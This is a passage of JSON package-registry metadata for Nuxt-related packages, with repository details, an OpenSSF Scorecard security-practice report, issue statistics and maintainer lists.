InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":31168404,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-29T21:28:10.185Z","status":"ssl_error","status_checked_at":"2026-03-29T21:23:32.226Z","response_time":89,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-03-30T02:00:40.819Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":29.64704261927198,"dependent_packages_count":42.38355423497933,"stargazers_count":0.39918618392780403,"forks_count":1.2635300279329609,"docker_downloads_count":null,"average":18.423328266528017},"purl":"pkg:maven/org.mvnpm.at.nuxt/nitro-server","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.mvnpm.at.nuxt:nitro-server","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.mvnpm.at.nuxt:nitro-server","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.mvnpm.at.nuxt:nitro-server/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-28T09:00:16.075Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786911.0872727273,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":589,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.4957762889600934,"merged_pull_requests_count":5385,"bot_issues_count":12,"bot_pull_requests_count":2971,"past_year_issues_count":701,"past_year_pull_requests_count":1163,"past_year_avg_time_to_close_issue":643507.1847826086,"past_year_avg_time_to_close_pull_request":224707.08352402746,"past_year_issues_closed_count":368,"past_year_pull_requests_closed_count":874,"past_year_pull_request_authors_count":115,"past_year_issue_authors_count":521,"past_year_avg_comments_per_issue":2.159771754636234,"past_year_avg_comments_per_pull_request":3.2768701633705932,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":467,"past_year_merged_pull_requests_count":766,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":221,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"OrbisK","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"Mini-ghost","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"BobbieGoede","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"DamianGlowala","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"cernymatej","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"wattanx","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"HugoRCD","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"antfu","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.nuxt:nitro-server/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.nuxt:nitro-server/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.nuxt:nitro-server/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.nuxt:nitro-server/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.nuxt:nitro-server/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.nuxt:nitro-server/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://repo.maven.apache.org/maven2","ecosystem":"maven","default":true,"packages_count":604801,"maintainers_count":0,"namespaces_count":79339,"keywords_count":0,"github":"maven-central","metadata":{"funded_packages_count":39644},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-04-03T06:29:38.544Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":2124808,"name":"nuxt-start-edge","ecosystem":"npm","description":"Starts Nuxt Application in production mode","homepage":"https://github.com/nuxt/nuxt.js","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":["nuxt","nuxt.js","nuxtjs","ssr","vue","vue isomorphic","vue server side","vue ssr","vue universal","vue versatile","vue.js","vuejs"],"namespace":null,"versions_count":1933,"first_release_published_at":"2018-08-31T19:02:56.948Z","latest_release_published_at":"2020-06-29T00:23:42.021Z","latest_release_number":"3.0.0-26556502.75dd90f2","last_synced_at":"2026-03-31T09:32:54.966Z","created_at":"2022-04-09T21:20:11.126Z","updated_at":"2026-03-31T09:32:54.967Z","registry_url":"https://www.npmjs.com/package/nuxt-start-edge","install_command":"npm install nuxt-start-edge","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"next":"3.0.0-26556502.75dd90f2","latest":"2.18.2-28661769.e265ef3"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-02-13T11:08:58.000Z","size":134344,"stargazers_count":59568,"open_issues_count":935,"forks_count":5524,"subscribers_count":784,"default_branch":"main","last_synced_at":"2026-02-13T11:29:52.149Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-02-13T11:06:01.000Z","dependencies_parsed_at":"2024-12-25T13:30:54.580Z","dependency_job_id":"22cffcce-6e0a-4001-b86c-b81e60fdf77b","html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":311,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29414277,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-13T06:24:03.484Z","status":"ssl_error","status_checked_at":"2026-02-13T06:23:12.830Z","response_time":78,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue 